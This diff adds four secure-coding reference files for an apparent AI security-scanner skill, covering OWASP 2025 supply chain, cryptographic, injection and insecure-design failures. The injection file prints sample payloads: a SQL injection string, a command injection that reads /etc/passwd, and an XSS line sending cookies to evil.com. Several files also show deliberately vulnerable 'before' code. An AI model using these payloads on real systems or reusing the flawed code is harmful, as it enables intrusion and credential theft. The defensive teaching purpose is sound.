create-agentic-app 1.1.56 → 1.1.58

package/template/.claude/skills/security-scanner/references/A03-software-supply-chain-failures.md

@@ -0,0 +1,117 @@
+# A03:2025 — Software Supply Chain Failures
+
+## Overview
+
+Software Supply Chain Failures is #3 in OWASP Top 10:2025. This category covers compromises in building, distributing, or updating software — vulnerabilities or malicious changes embedded in third-party code, tools, or dependencies. Notable incidents include SolarWinds (2019, 18,000 orgs compromised), Bybit ($1.5B theft, 2025), and Log4Shell (CVE-2021-44228).
+
+## Key CWEs
+
+- **CWE-937**: Using Components with Known Vulnerabilities
+- **CWE-1035**: Using Components from Untrusted Sources
+- **CWE-1104**: Use of Unmaintained Third-Party Components
+- **CWE-829**: Inclusion of Functionality from Untrusted Control Sphere
+- **CWE-494**: Download of Code Without Integrity Check
+- **CWE-506**: Embedded Malicious Code
+
+## What to Look For
+
+### General Patterns
+- Known vulnerable dependency versions in package manifests
+- Unpinned or wildcard dependency versions (`*`, `^`, `~` with major ranges)
+- CDN scripts loaded without Subresource Integrity (SRI) hashes
+- Missing lock files or significantly outdated lock files
+- Dependencies from unofficial or untrusted registries
+- No Software Bill of Materials (SBOM) tracking
+- Single-person deployment without review gates
+- CI/CD pipeline configs with weaker security than production
+- Transitive dependencies not tracked or audited
+
+### Grep Patterns
+
+```
+# Wildcard or loose versioning
+"\*"|"latest"|"\^0\."
+">="|"<="|"~"
+
+# CDN scripts without integrity
+<script.*src=.*cdn|<link.*href=.*cdn
+integrity=|crossorigin=
+
+# Known vulnerable patterns (check versions)
+lodash.*4\.17\.(0|1[0-1])  # prototype pollution
+axios.*0\.21\.[0-1]         # SSRF
+jsonwebtoken.*[5-8]\.       # various CVEs
+log4j.*2\.(0|1[0-6])        # Log4Shell
+
+# Package manifest files to check
+package\.json|requirements\.txt|Gemfile|go\.mod|pom\.xml|Cargo\.toml|\.csproj
+```
+
+### JavaScript / TypeScript / Node.js
+- Check `package.json` dependency versions against known CVEs
+- Look for `<script src="https://cdn...">` without `integrity` attribute in HTML/JSX
+- Run `npm audit` or `yarn audit` mentally — flag packages with known issues
+- Check for `package-lock.json` / `yarn.lock` existence and freshness
+- Flag use of deprecated packages (e.g., `request`, `querystring`)
+
+### Python
+- Check `requirements.txt` for pinned versions with known CVEs
+- Look for `pip install` without `--require-hashes`
+- Check for `Pipfile.lock` or `poetry.lock`
+
+### Java
+- Check `pom.xml` dependency versions against known CVEs
+- Look for `<repository>` entries pointing to unofficial Maven repos
+- Flag old Spring, Log4j, Jackson, or Apache Commons versions
+
+## Prevention Measures
+
+1. Generate and maintain Software Bill of Materials (SBOM)
+2. Track all direct and transitive dependencies
+3. Remove unused dependencies and unnecessary components
+4. Continuously monitor for CVEs (OWASP Dependency Check, Snyk, npm audit)
+5. Obtain components only from official, trusted sources via secure channels
+6. Implement Subresource Integrity (SRI) for all CDN-loaded resources
+7. Pin dependency versions and use lock files
+8. Implement staged rollouts, not simultaneous deployments
+9. Harden CI/CD pipelines with MFA and access controls
+10. Require code review for all changes before merge
+
+## Example Attack Scenarios
+
+**SolarWinds (2019):** Trusted vendor infiltrated — malware propagated to 18,000 orgs via software updates.
+
+**Log4Shell (2021):** CVE-2021-44228 in Apache Log4j enabled remote code execution, affecting millions of Java applications.
+
+**Shai-Hulud (2025):** First self-propagating npm worm infected 500+ package versions, harvesting developer credentials.
+
+## Fix Examples
+
+**Before (CDN without SRI):**
+```html
+<script src="https://cdn.example.com/lib.min.js"></script>
+```
+
+**After (CDN with SRI):**
+```html
+<script src="https://cdn.example.com/lib.min.js"
+  integrity="sha384-abc123..."
+  crossorigin="anonymous"></script>
+```
+
+**Before (loose dependency versions):**
+```json
+{ "lodash": "^4.17.0", "axios": "*" }
+```
+
+**After (pinned versions, updated):**
+```json
+{ "lodash": "4.17.21", "axios": "1.7.2" }
+```
+
+## References
+
+- [OWASP A03:2025](https://owasp.org/Top10/2025/A03_2025-Software_Supply_Chain_Failures/)
+- OWASP Dependency Check / Dependency Track
+- CycloneDX SBOM Standard
+- OWASP ASVS: Component Verification

package/template/.claude/skills/security-scanner/references/A04-cryptographic-failures.md

@@ -0,0 +1,141 @@
+# A04:2025 — Cryptographic Failures
+
+## Overview
+
+Cryptographic Failures is #4 in OWASP Top 10:2025 (down from #2). It covers failures related to lack of cryptography, insufficiently strong cryptography, leaking of cryptographic keys, and related errors. 32 CWEs mapped, 1,665,348 total occurrences, 2,185 CVEs.
+
+## Key CWEs
+
+- **CWE-261**: Weak Encoding for Password
+- **CWE-319**: Cleartext Transmission of Sensitive Information
+- **CWE-321**: Use of Hard-coded Cryptographic Key
+- **CWE-326**: Inadequate Encryption Strength
+- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
+- **CWE-328**: Reversible One-Way Hash
+- **CWE-330**: Use of Insufficiently Random Values
+- **CWE-338**: Use of Cryptographically Weak PRNG
+- **CWE-759**: Use of One-Way Hash Without a Salt
+- **CWE-916**: Use of Password Hash With Insufficient Computational Effort
+
+## What to Look For
+
+### General Patterns
+- Weak hashing algorithms used for passwords (MD5, SHA1, SHA256 without key stretching)
+- Missing salt in password hashing
+- Hardcoded cryptographic keys, secrets, or API keys in source code
+- Sensitive data transmitted without encryption (HTTP, FTP, SMTP)
+- Weak random number generation for security tokens (Math.random, rand())
+- Cookies missing `Secure` flag (sent over HTTP)
+- Sensitive data in logs (passwords, tokens, credit cards, PII)
+- Base64 encoding used as "encryption" for tokens or secrets
+- Deprecated crypto algorithms (DES, 3DES, RC4, MD5, SHA1)
+- Missing HSTS headers
+- Hardcoded IVs or nonces in encryption
+
+### Grep Patterns
+
+```
+# Weak hashing
+createHash\(['"]md5['"]\)|createHash\(['"]sha1['"]\)
+hashlib\.md5|hashlib\.sha1
+MessageDigest\.getInstance\(['"]MD5['"]\)|MessageDigest\.getInstance\(['"]SHA-1['"]\)
+md5\(|sha1\(
+
+# Weak randomness
+Math\.random|random\.random|rand\(\)|Random\(\)
+uuid.*v1|Date\.now
+
+# Hardcoded secrets/keys
+SECRET.*=\s*['"][^'"]{8,}|KEY.*=\s*['"][^'"]{8,}|PASSWORD.*=\s*['"][^'"]{4,}
+private.?key|secret.?key|api.?key|access.?token
+
+# Base64 as "encryption"
+Buffer\.from.*base64|btoa\(|atob\(
+base64\.encode|base64\.decode
+
+# Cookie security flags
+httpOnly\s*:\s*false|secure\s*:\s*false|sameSite.*none
+Set-Cookie(?!.*Secure)(?!.*HttpOnly)
+
+# Cleartext protocols
+http:\/\/(?!localhost)|ftp:\/\/|smtp:\/\/
+```
+
+### JavaScript / TypeScript / Node.js
+- `crypto.createHash('md5')` or `crypto.createHash('sha1')` for password hashing
+- `Math.random()` used for tokens, session IDs, or reset codes
+- `Buffer.from(data).toString('base64')` used as a "token" (trivially decodable)
+- Session cookies set without `httpOnly: true`, `secure: true`, `sameSite: 'strict'`
+- JWT secrets hardcoded in source files
+- Missing `bcrypt`, `argon2`, or `scrypt` for password hashing
+
+### Python
+- `hashlib.md5()` or `hashlib.sha1()` for passwords
+- `random.random()` or `random.randint()` for security tokens (should use `secrets` module)
+- `base64.b64encode()` used as encryption
+
+### Java
+- `MessageDigest.getInstance("MD5")` or `MessageDigest.getInstance("SHA-1")`
+- `java.util.Random` instead of `java.security.SecureRandom`
+- Hardcoded keys in `KeySpec` constructors
+
+## Prevention Measures
+
+1. Classify data and identify what needs encryption per privacy laws and regulations
+2. Don't store sensitive data unnecessarily — data not retained cannot be stolen
+3. Encrypt all sensitive data at rest using strong algorithms (AES-256)
+4. Use TLS 1.2+ for all data in transit; enforce with HSTS
+5. Store passwords with strong adaptive hashing: Argon2, scrypt, bcrypt, or PBKDF2
+6. Always use salts and appropriate work factors
+7. Use CSPRNG for all security-sensitive random values
+8. Never reuse IVs/nonces with the same key
+9. Use authenticated encryption (GCM mode, not ECB/CBC)
+10. Rotate cryptographic keys regularly
+11. Disable caching for responses containing sensitive data
+
+## Example Attack Scenarios
+
+**Scenario 1 — Weak Password Hashing:**
+Password database uses unsalted MD5. Attacker retrieves database via another vulnerability, cracks all passwords via rainbow tables in minutes.
+
+**Scenario 2 — Predictable Tokens:**
+Password reset tokens generated with `Math.random()`. Attacker predicts tokens and resets other users' passwords.
+
+## Fix Examples
+
+**Before (MD5 password hashing):**
+```typescript
+import crypto from 'crypto';
+function hashPassword(password: string) {
+  return crypto.createHash('md5').update(password).digest('hex');
+}
+```
+
+**After (bcrypt with salt):**
+```typescript
+import bcrypt from 'bcrypt';
+async function hashPassword(password: string) {
+  return bcrypt.hash(password, 12);
+}
+async function verifyPassword(password: string, hash: string) {
+  return bcrypt.compare(password, hash);
+}
+```
+
+**Before (predictable token):**
+```typescript
+const resetToken = Math.random().toString(36).substring(2);
+```
+
+**After (cryptographically secure token):**
+```typescript
+import crypto from 'crypto';
+const resetToken = crypto.randomBytes(32).toString('hex');
+```
+
+## References
+
+- [OWASP A04:2025](https://owasp.org/Top10/2025/A04_2025-Cryptographic_Failures/)
+- OWASP Cheat Sheet: Password Storage
+- OWASP Cheat Sheet: Cryptographic Storage
+- OWASP Cheat Sheet: Transport Layer Protection

package/template/.claude/skills/security-scanner/references/A05-injection.md

@@ -0,0 +1,155 @@
+# A05:2025 — Injection
+
+## Overview
+
+Injection is #5 in OWASP Top 10:2025 (down from #3). 100% of applications were tested for injection, and the category holds the highest CVE count at 62,445 across 37 CWEs. Injection occurs when untrusted user input is sent to an interpreter and executed as commands — including SQL, NoSQL, OS command, ORM, LDAP, and Expression Language injection. Cross-Site Scripting (XSS) is included in this category.
+
+## Key CWEs
+
+- **CWE-79**: Cross-site Scripting (XSS) — 30,000+ CVEs
+- **CWE-89**: SQL Injection — 14,000+ CVEs
+- **CWE-78**: OS Command Injection
+- **CWE-20**: Improper Input Validation
+- **CWE-94**: Improper Control of Generation of Code (Code Injection)
+- **CWE-77**: Command Injection
+- **CWE-74**: Injection (general)
+- **CWE-917**: Expression Language Injection
+- **CWE-1336**: Template Injection
+
+## What to Look For
+
+### SQL Injection
+- String concatenation in SQL queries (instead of parameterized queries)
+- Template literals embedding user input directly into SQL
+- ORM methods with raw query options using unsanitized input
+- Dynamic table/column names from user input
+
+### Command Injection
+- `exec()`, `spawn()`, `system()`, `popen()` with user-controlled arguments
+- Shell command strings built with user input concatenation
+- `child_process` usage with unsanitized input
+
+### Cross-Site Scripting (XSS)
+- `dangerouslySetInnerHTML` in React without sanitization
+- `innerHTML`, `outerHTML`, `document.write()` with user data
+- Template rendering of unsanitized user input
+- URL parameters reflected into HTML without encoding
+
+### Code Injection
+- `eval()` with user-controlled input
+- `Function()` constructor with user input
+- `setTimeout`/`setInterval` with string arguments from user input
+- Dynamic `import()` with user-controlled paths
+
+### Server-Side Request Forgery (SSRF)
+- HTTP requests where the URL is user-controlled
+- URL parsing/fetching endpoints without allowlist validation
+- Image/preview/proxy endpoints fetching arbitrary URLs
+
+### Grep Patterns
+
+```
+# SQL injection
+\+.*['"].*SELECT|SELECT.*\+.*req\.|SELECT.*\$\{|SELECT.*%s
+\.query\(.*\+|\.execute\(.*\+|\.raw\(.*\+
+f"SELECT|f"INSERT|f"UPDATE|f"DELETE
+
+# Command injection
+exec\(|execSync\(|spawn\(|spawnSync\(
+child_process|subprocess|os\.system|os\.popen
+Runtime\.getRuntime\(\)\.exec
+
+# XSS
+dangerouslySetInnerHTML|innerHTML|outerHTML|document\.write
+v-html|ng-bind-html|\{\{\{.*\}\}\}
+
+# Code injection
+eval\(|Function\(|new Function|setTimeout\(.*req|setInterval\(.*req
+
+# SSRF
+fetch\(.*req\.|axios\(.*req\.|http\.get\(.*req\.|urllib.*req\.
+request\.get\(.*user|requests\.get\(.*param
+```
+
+### JavaScript / TypeScript / Node.js
+- Template literals in SQL: `` `SELECT * FROM users WHERE id = ${req.params.id}` ``
+- `exec(command)` where command includes user input
+- `dangerouslySetInnerHTML={{ __html: userContent }}`
+- `eval(req.body.code)` or similar
+- `fetch(req.query.url)` in preview/proxy endpoints
+
+### Python (Django/Flask)
+- `cursor.execute(f"SELECT ... {user_input}")` — use parameterized queries
+- `os.system(f"command {user_input}")` — use subprocess with shell=False
+- `eval(request.data)` or `exec(request.data)`
+- Jinja2 `|safe` filter on user input
+
+### Java (Spring)
+- `Statement.executeQuery()` with concatenated SQL (use `PreparedStatement`)
+- `Runtime.getRuntime().exec()` with user input
+- JSP `<%= request.getParameter() %>` without encoding
+
+## Prevention Measures
+
+1. Use parameterized queries / prepared statements for ALL database access
+2. Use safe APIs that avoid the interpreter entirely
+3. Implement positive server-side input validation (allowlists)
+4. Escape special characters using interpreter-specific syntax
+5. Use LIMIT and other SQL controls to prevent mass disclosure
+6. For XSS: use framework auto-escaping, CSP headers, sanitize HTML (DOMPurify)
+7. For command injection: avoid shell execution entirely; use library functions
+8. For SSRF: validate and allowlist URLs; block internal network ranges
+
+## Example Attack Scenarios
+
+**Scenario 1 — SQL Injection:**
+```
+https://example.com/search?q=' OR '1'='1
+```
+Query becomes: `SELECT * FROM items WHERE name = '' OR '1'='1'` — returns all records.
+
+**Scenario 2 — Command Injection:**
+```
+https://example.com/export?file=report;cat /etc/passwd
+```
+Server executes: `convert report;cat /etc/passwd` — leaks system files.
+
+**Scenario 3 — XSS:**
+User stores `<script>document.location='https://evil.com/steal?c='+document.cookie</script>` as content, which executes in other users' browsers.
+
+## Fix Examples
+
+**Before (SQL injection):**
+```typescript
+const query = `SELECT * FROM notes WHERE title LIKE '%${searchTerm}%'`;
+const results = db.all(query);
+```
+
+**After (parameterized query):**
+```typescript
+const results = db.all(
+  'SELECT * FROM notes WHERE title LIKE ?',
+  [`%${searchTerm}%`]
+);
+```
+
+**Before (command injection):**
+```typescript
+const { exec } = require('child_process');
+exec(`convert ${req.query.filename} output.pdf`);
+```
+
+**After (safe alternative):**
+```typescript
+const { execFile } = require('child_process');
+const safeName = path.basename(req.query.filename);
+execFile('convert', [safeName, 'output.pdf']);
+```
+
+## References
+
+- [OWASP A05:2025](https://owasp.org/Top10/2025/A05_2025-Injection/)
+- OWASP Cheat Sheet: Injection Prevention
+- OWASP Cheat Sheet: SQL Injection Prevention
+- OWASP Cheat Sheet: Query Parameterization
+- OWASP Cheat Sheet: XSS Prevention

package/template/.claude/skills/security-scanner/references/A06-insecure-design.md

@@ -0,0 +1,145 @@
+# A06:2025 — Insecure Design
+
+## Overview
+
+Insecure Design is #6 in OWASP Top 10:2025. This category focuses on architectural and design flaws — not implementation bugs. "A secure design can still have implementation defects, but an insecure design cannot be fixed by a perfect implementation." It encompasses 39 CWEs with 729,882 total occurrences. The focus is on missing or ineffective control design around requirements, secure design methodology, and secure development lifecycle.
+
+## Key CWEs
+
+- **CWE-256**: Unprotected Storage of Credentials
+- **CWE-269**: Improper Privilege Management
+- **CWE-434**: Unrestricted Upload of File with Dangerous Type
+- **CWE-501**: Trust Boundary Violation
+- **CWE-522**: Insufficiently Protected Credentials
+- **CWE-657**: Violation of Secure Design Principles
+- **CWE-799**: Improper Control of Interaction Frequency
+- **CWE-807**: Reliance on Untrusted Inputs in Security Decisions
+
+## What to Look For
+
+### General Patterns
+- Missing rate limiting on sensitive endpoints (login, registration, password reset, OTP verification)
+- No input validation or schema validation on API endpoints
+- Business logic flaws (no password complexity requirements, unlimited retries)
+- Missing account lockout mechanisms after failed login attempts
+- Lack of defense in depth (single layer of protection)
+- Reset/verification tokens that are guessable, short, or never expire
+- Missing CAPTCHA or bot protection on public-facing forms
+- Unrestricted file upload (no type/size validation)
+- Security decisions based on client-side data
+- Missing tenant isolation in multi-tenant applications
+- No threat modeling evidence (design assumes trusted users)
+
+### Grep Patterns
+
+```
+# Missing rate limiting
+rateLimit|rate.?limit|throttle|express-rate-limit|slowDown
+login|signin|sign-in|authenticate|register|signup|sign-up
+reset.*password|forgot.*password|verify.*otp|verify.*code
+
+# Missing input validation
+body\.|req\.body\.|request\.body
+zod|yup|joi|ajv|validate|validator|schema
+express-validator|class-validator
+
+# Password policy
+password.*length|minLength|maxLength|complexity|strength
+passwordPolicy|password.*requirements
+
+# File upload without validation
+multer|formidable|busboy|upload
+fileFilter|allowedTypes|mimeType|fileSize|maxSize
+
+# Token expiration
+expires|expiry|expiration|ttl|maxAge
+resetToken|verificationToken|otpExpiry
+
+# Account lockout
+lockout|maxAttempts|failedAttempts|loginAttempts|accountLock
+```
+
+### JavaScript / TypeScript / Node.js
+- Express/Next.js API routes without `express-rate-limit` or equivalent middleware
+- Login/register endpoints accepting any password (no length/complexity check)
+- Password reset tokens using short numeric codes without expiration
+- File uploads via `multer` without `fileFilter` or size limits
+- Missing input validation — `req.body` used directly without Zod/Joi/Yup schema
+
+### Python (Django/Flask)
+- Views without `@ratelimit` decorator on auth endpoints
+- Missing `AUTH_PASSWORD_VALIDATORS` in Django settings
+- File uploads without `ALLOWED_EXTENSIONS` check
+- No `django-axes` or equivalent brute-force protection
+
+### Java (Spring)
+- Missing `@RateLimiter` on authentication controllers
+- No password policy configuration in `SecurityConfig`
+- `MultipartFile` accepted without content type validation
+
+## Prevention Measures
+
+1. Establish a secure development lifecycle with AppSec professionals
+2. Build and maintain libraries of secure design patterns and components
+3. Use threat modeling for critical authentication, access control, and business logic
+4. Integrate security requirements into user stories
+5. Write unit and integration tests that validate threat resistance
+6. Implement rate limiting on all sensitive endpoints
+7. Enforce input validation at every tier (client, API, database)
+8. Segregate system layers based on exposure and protection needs
+9. Implement robust multi-tenant isolation across all tiers
+
+## Example Attack Scenarios
+
+**Scenario 1:** Recovery workflows using knowledge-based questions ("security questions") — multiple people can know the answers, violating NIST 800-63b.
+
+**Scenario 2:** Cinema booking system allows unlimited group discount reservations without deposit or rate limiting — attacker books hundreds of seats, causing revenue loss.
+
+**Scenario 3:** E-commerce platform lacks bot protection — scalpers buy all limited inventory in seconds using automated tools.
+
+## Fix Examples
+
+**Before (no rate limiting on login):**
+```typescript
+export async function POST(req) {
+  const { email, password } = await req.json();
+  const user = await db.get('SELECT * FROM users WHERE email = ?', email);
+  // ... verify password and return token
+}
+```
+
+**After (with rate limiting):**
+```typescript
+import rateLimit from 'express-rate-limit';
+
+const loginLimiter = rateLimit({
+  windowMs: 15 * 60 * 1000, // 15 minutes
+  max: 5, // 5 attempts per window
+  message: { error: 'Too many login attempts, please try again later' }
+});
+
+// Apply loginLimiter middleware to the login route
+```
+
+**Before (no password policy):**
+```typescript
+const { password } = await req.json();
+const hash = await bcrypt.hash(password, 12);
+```
+
+**After (with password policy):**
+```typescript
+const { password } = await req.json();
+if (password.length < 12) return Response.json({ error: 'Password must be at least 12 characters' }, { status: 400 });
+if (!/[A-Z]/.test(password) || !/[0-9]/.test(password)) {
+  return Response.json({ error: 'Password must contain uppercase and numbers' }, { status: 400 });
+}
+const hash = await bcrypt.hash(password, 12);
+```
+
+## References
+
+- [OWASP A06:2025](https://owasp.org/Top10/2025/A06_2025-Insecure_Design/)
+- OWASP Secure Design Principles Cheat Sheet
+- OWASP SAMM Design
+- The Threat Modeling Manifesto